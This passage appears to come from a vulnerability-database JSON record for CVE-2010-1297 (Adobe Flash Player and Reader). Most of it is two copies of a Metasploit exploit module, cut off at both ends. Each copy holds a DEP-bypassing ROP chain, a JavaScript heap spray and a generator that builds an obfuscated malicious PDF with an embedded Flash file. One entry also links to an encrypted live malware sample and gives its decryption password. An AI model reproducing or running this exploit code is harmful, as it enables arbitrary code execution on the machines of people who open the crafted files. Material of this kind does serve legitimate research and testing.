ret\r\n\t\t\t0x10124,\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10104,\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x1000,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x7ffe0300, # -- location of KiFastSystemCall\r\n\t\t\t0x7007fb2, # mov eax, [ecx] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x10100,\r\n\t\t\t0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\r\n\t\t\t0x70072f7, # pop eax / ret\r\n\t\t\t0x10011,\r\n\t\t\t0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\r\n\t\t\t0x7005c54, # pop esi / add esp,0x14 / ret\r\n\t\t\t0xffffffff,\r\n\t\t\t0x10100,\r\n\t\t\t0x0,\r\n\t\t\t0x10104,\r\n\t\t\t0x1000,\r\n\t\t\t0x40,\r\n\t\t\t# The next bit effectively copies data from the interleaved stack to the memory\r\n\t\t\t# pointed to by eax\r\n\t\t\t# The data copied is:\r\n\t\t\t# \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\r\n\t\t\t# \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\r\n\t\t\t# \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x9054905a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5815eb5a,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x18891a8b,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x8304c083,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xfb8104c2,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xc0c0c0c,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x5ebee75,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0xffffe6e8,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x909090ff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90909090,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700a722, # add eax, 4 / ret\r\n\t\t\t0x70015bb, # pop ecx / ret\r\n\t\t\t0x90ffffff,\r\n\t\t\t0x700154d, # mov [eax], ecx / ret\r\n\t\t\t0x700d731, # mov eax, [ebp-0x24] / ret\r\n\t\t\t0x700112f # call eax -- (execute stub to transition to full shellcode)\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj\\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(swf, js)\r\n\r\n\t\tswf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\t#pdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<</Type/Catalog\")\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(5)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3) << nObfu(\"<</Type/Pages/Count 1/Kids [\") << ioRef(4) << nObfu(\"]>>\") << eol << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4) << nObfu(\"<</Type/Page/Parent \") << ioRef(3)\r\n\t\tpdf << nObfu(\"/Annots [\") << ioRef(7) << nObfu(\"] \")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<</Type/Action/S/JavaScript/JS \") + ioRef(6) + \">>\" << eol << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(6) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# swf annotation object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<</Type/Annot/Subtype/RichMedia\")\r\n\t\tpdf << nObfu(\"/Rect [20 20 187 69] \")\r\n\t\tpdf << nObfu(\"/RichMediaSettings \") << ioRef(8)\r\n\t\tpdf << nObfu(\"/RichMediaContent \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/NM (\") << swf_name << nObfu(\")\")\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media settings\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Activation \") << ioRef(10)\r\n\t\tpdf << nObfu(\"/Deactivation \") << ioRef(11)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media content\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaContent\")\r\n\t\tpdf << nObfu(\"/Assets \") << ioRef(12)\r\n\t\tpdf << nObfu(\"/Configurations [\") << ioRef(14) << \"]\"\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media activation / deactivation\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(10)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media assets\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(12)\r\n\t\tpdf << nObfu(\"<</Names [(#{swf_name}) \") << ioRef(13) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf embeded file ref\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</Type/Filespec /EF <</F \") << ioRef(16) << nObfu(\">> /F(#{swf_name})>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media configuration\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Instances [\") << ioRef(15) << nObfu(\"]>>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# rich media isntance\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(15)\r\n\t\tpdf << nObfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\r\n\t\tpdf << nObfu(\"/Asset \") << ioRef(13)\r\n\t\tpdf << nObfu(\">>\")\r\n\t\tpdf << eol << endobj\r\n\r\n\t\t# swf stream\r\n\t\t# NOTE: This data is already compressed, no need to compress it again...\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(16) << nObfu(\"<</Type/EmbeddedFile/Length %s>>\" % swf.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << swf << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16614/"}, {"lastseen": "2016-02-01T18:28:49", "description": "0day Exploit for Adobe Flash and Reader PoC (from the wild). CVE-2010-1297. Remote exploits for multiple platform", "published": "2010-06-09T00:00:00", "type": "exploitdb", "title": "Adobe Flash and Reader - Exploit PoC 0day", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2010-06-09T00:00:00", "id": "EDB-ID:13787", "href": "https://www.exploit-db.com/exploits/13787/", "sourceData": "# Exploit-DB Note - Live POC originally found at http://qoop.org/security/poc/cve-2010-1297/\r\n\r\n# File is malicious! Taken from the wild! Beware!\r\n# To decrypt the file:\r\n# openssl aes-256-cbc -d -a -in adobe-0day-2010-1297.tar.enc -out adobe-0day-2010-1297.tar\r\n# Password is \"edb\" without the quotes.\r\n\r\nNOTE: This was taken out of live malware and was not modified. BEWARE.\r\n\r\nBy visiting the following link, you agree that you are responsible for any damages that occur.\r\n\r\nhttps://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13787.tar.enc (adobe-0day-2010-1297.tar.enc)\r\n\r\n\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/13787/"}], "canvas": [{"lastseen": "2019-05-29T17:19:26", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "edition": 2, "description": "**Name**| flash_newfunction \n---|--- \n**CVE**| CVE-2010-1297 \n**Exploit Pack**| [CANVAS](<http://http://www.immunityinc.com/products-canvas.shtml>) \n**Description**| Adobe Acrobat Flash Invalid newfunction call \n**Notes**| CVE Name: CVE-2010-1297 \nVENDOR: Adobe \nNOTES: Exploitation through an PDF file is more reliable than with a direct HTML/Flash exploit \nVersionsAffected: Acrobat 9.3 and below \nRepeatability: \nCVE URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1297 \nReferences: http://www.adobe.com/support/security/advisories/apsb10-14.html \nDate public: 06/04/10 \nCVSS: 9.3 \n\n", "modified": "2010-06-08T18:30:00", "published": "2010-06-08T18:30:00", "id": "FLASH_NEWFUNCTION", "href": "http://exploitlist.immunityinc.com/home/exploitpack/CANVAS/flash_newfunction", "type": "canvas", "title": "Immunity Canvas: FLASH_NEWFUNCTION", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2020-08-27T01:39:31", "description": "This module exploits a vulnerability in the DoABC tag handling within versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also vulnerable, as are any other applications that may embed Flash player. Arbitrary code execution is achieved by embedding a specially crafted Flash movie into a PDF document. An AcroJS heap spray is used in order to ensure that the memory used by the invalid pointer issue is controlled. NOTE: This module uses a similar DEP bypass method to that used within the adobe_libtiff module. This method is unlikely to work across various Windows versions due a the hardcoded syscall number.\n", "published": "2010-06-10T19:52:43", "type": "metasploit", "title": "Adobe Flash Player \"newfunction\" Invalid Pointer Use", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-1297"], "modified": "2020-01-15T01:47:27", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/ADOBE_FLASHPLAYER_NEWFUNCTION", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'zlib'\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Adobe Flash Player \"newfunction\" Invalid Pointer Use',\n 'Description' => %q{\n This module exploits a vulnerability in the DoABC tag handling within\n versions 9.x and 10.0 of Adobe Flash Player. Adobe Reader and Acrobat are also\n vulnerable, as are any other applications that may embed Flash player.\n\n Arbitrary code execution is achieved by embedding a specially crafted Flash\n movie into a PDF document. An AcroJS heap spray is used in order to ensure\n that the memory used by the invalid pointer issue is controlled.\n\n NOTE: This module uses a similar DEP bypass method to that used within the\n adobe_libtiff module. This method is unlikely to work across various\n Windows versions due a the hardcoded syscall number.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'Unknown', # Found being openly exploited\n 'jduck' # Metasploit version\n ],\n 'References' =>\n [\n ['CVE', '2010-1297'],\n ['OSVDB', '65141'],\n ['BID', '40586'],\n ['URL', 'http://www.adobe.com/support/security/advisories/apsa10-01.html'],\n # For SWF->PDF embedding\n ['URL', 'http://feliam.wordpress.com/2010/02/11/flash-on-a-pdf-with-minipdf-py/']\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n 'InitialAutoRunScript' => 'post/windows/manage/priv_migrate',\n 'DisablePayloadHandler' => true\n },\n 'Payload' =>\n {\n 'Space' => 1000,\n 'BadChars' => \"\\x00\",\n 'DisableNops' => true\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n # Tested OK via Adobe Reader 9.3.0 on Windows XP SP3 (uses flash 10.0.42.34) -jjd\n # Tested OK via Adobe Reader 9.3.1 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n # Tested OK via Adobe Reader 9.3.2 on Windows XP SP3 (uses flash 10.0.45.2) -jjd\n [ 'Automatic', { }],\n ],\n 'DisclosureDate' => 'Jun 04 2010',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.pdf']),\n ])\n end\n\n def exploit\n swf_data = make_swf()\n js_data = make_js(payload.encoded)\n\n # Create the pdf\n pdf = make_pdf(swf_data, js_data)\n\n print_status(\"Creating '#{datastore['FILENAME']}' file...\")\n\n file_create(pdf)\n end\n\n def make_swf\n # load the static swf file\n path = File.join( Msf::Config.data_directory, \"exploits\", \"CVE-2010-1297.swf\" )\n fd = File.open( path, \"rb\" )\n swf_data = fd.read(fd.stat.size)\n fd.close\n swf_data\n end\n\n def make_js(encoded_payload)\n\n # The following executes a ret2lib using BIB.dll\n # The effect is to bypass DEP and execute the shellcode in an indirect way\n stack_data = [\n 0xc0c0c0c,\n 0x7004919, # pop ecx / pop ecx / mov [eax+0xc0],1 / pop esi / pop ebx / ret\n 0xcccccccc,\n 0x70048ef, # xchg eax,esp / ret\n 0x700156f, # mov eax,[ecx+0x34] / push [ecx+0x24] / call [eax+8]\n 0xcccccccc,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009033, # ret 0x18\n 0x7009084, # ret\n 0xc0c0c0c,\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7009084, # ret\n 0x7001599, # pop ebp / ret\n 0x10124,\n 0x70072f7, # pop eax / ret\n 0x10104,\n 0x70015bb, # pop ecx / ret\n 0x1000,\n 0x700154d, # mov [eax], ecx / ret\n 0x70015bb, # pop ecx / ret\n 0x7ffe0300, # -- location of KiFastSystemCall\n 0x7007fb2, # mov eax, [ecx] / ret\n 0x70015bb, # pop ecx / ret\n 0x10011,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70015bb, # pop ecx / ret\n 0x10100,\n 0x700a8ac, # mov [ecx], eax / xor eax,eax / ret\n 0x70072f7, # pop eax / ret\n 0x10011,\n 0x70052e2, # call [eax] / ret -- (KiFastSystemCall - VirtualAlloc?)\n 0x7005c54, # pop esi / add esp,0x14 / ret\n 0xffffffff,\n 0x10100,\n 0x0,\n 0x10104,\n 0x1000,\n 0x40,\n # The next bit effectively copies data from the interleaved stack to the memory\n # pointed to by eax\n # The data copied is:\n # \\x5a\\x90\\x54\\x90\\x5a\\xeb\\x15\\x58\\x8b\\x1a\\x89\\x18\\x83\\xc0\\x04\\x83\n # \\xc2\\x04\\x81\\xfb\\x0c\\x0c\\x0c\\x0c\\x75\\xee\\xeb\\x05\\xe8\\xe6\\xff\\xff\n # \\xff\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xff\\xff\\xff\\x90\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x70015bb, # pop ecx / ret\n 0x9054905a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5815eb5a,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x18891a8b,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x8304c083,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xfb8104c2,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xc0c0c0c,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x5ebee75,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0xffffe6e8,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x909090ff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90909090,\n 0x700154d, # mov [eax], ecx / ret\n 0x700a722, # add eax, 4 / ret\n 0x70015bb, # pop ecx / ret\n 0x90ffffff,\n 0x700154d, # mov [eax], ecx / ret\n 0x700d731, # mov eax, [ebp-0x24] / ret\n 0x700112f # call eax -- (execute stub to transition to full shellcode)\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj\\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(swf, js)\n\n swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n #pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<</Type/Catalog\")\n pdf << n_obfu(\"/Pages \") << io_ref(3)\n pdf << n_obfu(\"/OpenAction \") << io_ref(5)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(3) << n_obfu(\"<</Type/Pages/Count 1/Kids [\") << io_ref(4) << n_obfu(\"]>>\") << eol << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(4) << n_obfu(\"<</Type/Page/Parent \") << io_ref(3)\n pdf << n_obfu(\"/Annots [\") << io_ref(7) << n_obfu(\"] \")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<</Type/Action/S/JavaScript/JS \") + io_ref(6) + \">>\" << eol << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(6) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # swf annotation object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<</Type/Annot/Subtype/RichMedia\")\n pdf << n_obfu(\"/Rect [20 20 187 69] \")\n pdf << n_obfu(\"/RichMediaSettings \") << io_ref(8)\n pdf << n_obfu(\"/RichMediaContent \") << io_ref(9)\n pdf << n_obfu(\"/NM (\") << swf_name << n_obfu(\")\")\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media settings\n xref << pdf.length\n pdf << io_def(8)\n pdf << n_obfu(\"<</Type/RichMediaSettings/Subtype/Flash\")\n pdf << n_obfu(\"/Activation \") << io_ref(10)\n pdf << n_obfu(\"/Deactivation \") << io_ref(11)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media content\n xref << pdf.length\n pdf << io_def(9)\n pdf << n_obfu(\"<</Type/RichMediaContent\")\n pdf << n_obfu(\"/Assets \") << io_ref(12)\n pdf << n_obfu(\"/Configurations [\") << io_ref(14) << \"]\"\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # rich media activation / deactivation\n xref << pdf.length\n pdf << io_def(10)\n pdf << n_obfu(\"<</Type/RichMediaActivation/Condition/PO>>\")\n pdf << eol << endobj\n\n xref << pdf.length\n pdf << io_def(11)\n pdf << n_obfu(\"<</Type/RichMediaDeactivation/Condition/XD>>\")\n pdf << eol << endobj\n\n # rich media assets\n xref << pdf.length\n pdf << io_def(12)\n pdf << n_obfu(\"<</Names [(#{swf_name}) \") << io_ref(13) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # swf embeded file ref\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</Type/Filespec /EF <</F \") << io_ref(16) << n_obfu(\">> /F(#{swf_name})>>\")\n pdf << eol << endobj\n\n # rich media configuration\n xref << pdf.length\n pdf << io_def(14)\n pdf << n_obfu(\"<</Type/RichMediaConfiguration/Subtype/Flash\")\n pdf << n_obfu(\"/Instances [\") << io_ref(15) << n_obfu(\"]>>\")\n pdf << eol << endobj\n\n # rich media isntance\n xref << pdf.length\n pdf << io_def(15)\n pdf << n_obfu(\"<</Type/RichMediaInstance/Subtype/Flash\")\n pdf << n_obfu(\"/Asset \") << io_ref(13)\n pdf << n_obfu(\">>\")\n pdf << eol << endobj\n\n # swf stream\n # NOTE: This data is already compressed, no need to compress it again...\n xref << 